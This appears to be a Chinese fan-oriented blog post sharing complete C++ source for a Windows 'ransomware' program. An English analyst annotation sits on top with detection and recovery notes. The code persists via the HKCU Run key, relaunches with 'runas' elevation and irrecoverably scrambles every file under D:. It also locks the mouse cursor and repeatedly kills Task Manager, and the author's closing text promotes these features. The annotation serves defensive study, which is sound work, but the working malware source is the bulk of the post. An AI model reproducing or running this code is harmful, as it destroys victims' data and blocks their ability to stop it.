首先感谢粉丝的支持!
上代码!
/*
 * Analyst annotation. The code below is reproduced unchanged from the post.
 *
 * Behaviour, function by function (as written in this listing):
 *
 *   test()        Opens the CurrentVersion Run key under HKEY_CURRENT_USER with
 *                 KEY_ALL_ACCESS and reads one value with RegGetValue. If that
 *                 read fails or the result differs from the running module's
 *                 path (GetModuleFileName), it writes the module path as a
 *                 REG_SZ value named "GISRestart". The value name it reads is
 *                 not the name it writes, so hunting should key on the written
 *                 name.
 *   ManagerRun()  Fills a SHELLEXECUTEINFO with lpVerb "runas" and calls
 *                 ShellExecuteEx to start `exe` with `param`, then closes the
 *                 returned process handle.
 *   main()        argc == 1: hides the console window, calls
 *                 ManagerRun(argv[0], "2") and returns 1.
 *                 argc == 2: reads one token from "die.txt". If it contains
 *                 "false", prints a message, runs system("pause") and returns 0.
 *                 Otherwise it creates and detaches a thread running
 *                 do_thread, calls test(), seeds rand() with time(NULL) and
 *                 calls traverFile("D:").
 *   traverFile()  Enumerates pathName with FindFirstFile / FindNextFile,
 *                 recurses into entries whose dwFileAttributes equals
 *                 FILE_ATTRIBUTE_DIRECTORY (skipping "." and ".."), and passes
 *                 every other entry to encryption().
 *   encryption()  Reads whitespace-delimited tokens with operator>>, XORs each
 *                 character with a fresh rand() value, reopens the same path
 *                 for output and writes the tokens back in reverse index order
 *                 with a randomly chosen separator.
 *   do_thread()   Endless loop: SetCursorPos(0, 0),
 *                 system("taskkill /F /IM taskmgr.exe"), Sleep(10).
 *
 * Defender notes:
 *
 *   Recovery.     Nothing in the listing stores a key or the rand() outputs,
 *                 and the original token order and whitespace are discarded on
 *                 rewrite. No routine here can restore a processed file, so
 *                 treat affected files as destroyed and restore from backup.
 *   Detection.    (1) A REG_SZ executable path written to the HKCU Run key,
 *                 value name "GISRestart".
 *                 (2) A process relaunching its own image through the "runas"
 *                 verb with the single argument "2".
 *                 (3) taskkill.exe spawned repeatedly against taskmgr.exe at a
 *                 roughly 10 ms cadence.
 *                 (4) One process rewriting many files in place under D:.
 *   Containment.  The argc == 2 path returns before any other action when the
 *                 token read from die.txt in the working directory contains
 *                 "false".
 *   Mitigation.   On the argc == 1 path the destructive code is reached only
 *                 through the "runas" relaunch, which normally surfaces an
 *                 elevation prompt (confirm for the host's UAC policy).
 *                 Application allow-listing and offline or versioned backups
 *                 address the file-destruction path directly.
 */
#include#include #include #include #include #include using namespace std; void traverFile(char* pathName); void encryption(char* fileName); void *do_thread(void *arg); void test() { HKEY hKey; if(RegOpenKeyEx(HKEY_CURRENT_USER, _T("SOFTWARE\Microsoft\Windows\CurrentVersion\Run"), 0, KEY_ALL_ACCESS, &hKey) == ERROR_SUCCESS) { TCHAR strExeFullDir[MAX_PATH]; GetModuleFileName(NULL, strExeFullDir, MAX_PATH); TCHAR strDir[MAX_PATH] = {}; DWORD nLength = MAX_PATH; long result = RegGetValue(hKey, nullptr, _T("勒索病毒"), RRF_RT_REG_SZ, 0, strDir, &nLength); if(result != ERROR_SUCCESS || _tcscmp(strExeFullDir, strDir) != 0) { RegSetValueEx(hKey, _T("GISRestart"), 0, REG_SZ, (LPBYTE)strExeFullDir, (lstrlen(strExeFullDir) + 1)*sizeof(TCHAR)); RegCloseKey(hKey); } } } void ManagerRun(LPCSTR exe, LPCSTR param, int nShow = SW_SHOW) { SHELLEXECUTEINFO ShExecInfo; ShExecInfo.cbSize = sizeof(SHELLEXECUTEINFO); ShExecInfo.fMask = SEE_MASK_NOCLOSEPROCESS ; ShExecInfo.hwnd = NULL; ShExecInfo.lpVerb = "runas"; ShExecInfo.lpFile = exe; ShExecInfo.lpParameters = param; ShExecInfo.lpDirectory = NULL; ShExecInfo.nShow = nShow; ShExecInfo.hInstApp = NULL; BOOL ret = ShellExecuteEx(&ShExecInfo); CloseHandle(ShExecInfo.hProcess); } int main(int argc, char *argv[]) { if(argc == 1) { ShowWindow(GetConsoleWindow(), SW_HIDE); ManagerRun(argv[0], "2"); return 1; } else if(argc == 2) { string s; ifstream in("die.txt"); in >> s; if(int(s.find("false")) != -1) { cout << "检测到结束文件,已结束病毒!" 
<< endl; system("pause"); return 0; } pthread_t tid; int ret; ret = pthread_create(&tid, NULL, do_thread, NULL); if(ret) { fprintf(stderr, "创建线程失败!n"); return -1; } ret = pthread_detach(tid); test(); srand((unsigned int)time(NULL)); traverFile("D:"); } return 0; } void encryption(char* fileName) { string s[100000]; ifstream in; in.open(fileName); int i = 1; while(in >> s[i]) { for(int j = 0; j < s[i].size(); j++) s[i][j] = (s[i][j] ^ rand()); i++; } ofstream out; out.open(fileName); while(i--) out << s[i] << (rand() % 2 ? " " : "n"); } void traverFile(char* pathName) { WIN32_FIND_DATA findData; char buff[MAX_PATH]; char temp[MAX_PATH]; sprintf(buff, "%s\\*.*", pathName); HANDLE hFile = FindFirstFile(buff, &findData); if(INVALID_HANDLE_VALUE == hFile) return; BOOL isContinue = true; while(isContinue) { memset(temp, 0, MAX_PATH); sprintf(temp, "%s\\%s", pathName, findData.cFileName); if(FILE_ATTRIBUTE_DIRECTORY == findData.dwFileAttributes) { if(strcmp(".", findData.cFileName) && strcmp("..", findData.cFileName)) { traverFile(temp); } } else encryption(temp); isContinue = FindNextFile(hFile, &findData); } } void *do_thread(void *arg) { while(true) { SetCursorPos(0, 0); system("taskkill /F /IM taskmgr.exe"); Sleep(10); } }
这个病毒新增了提升到管理员权限的功能,同时运行两段代码,一边加密D盘,一边定住鼠标,关闭任务管理器!
请勿滥用此代码!
好了,本期就到这里,感谢粉丝支持!



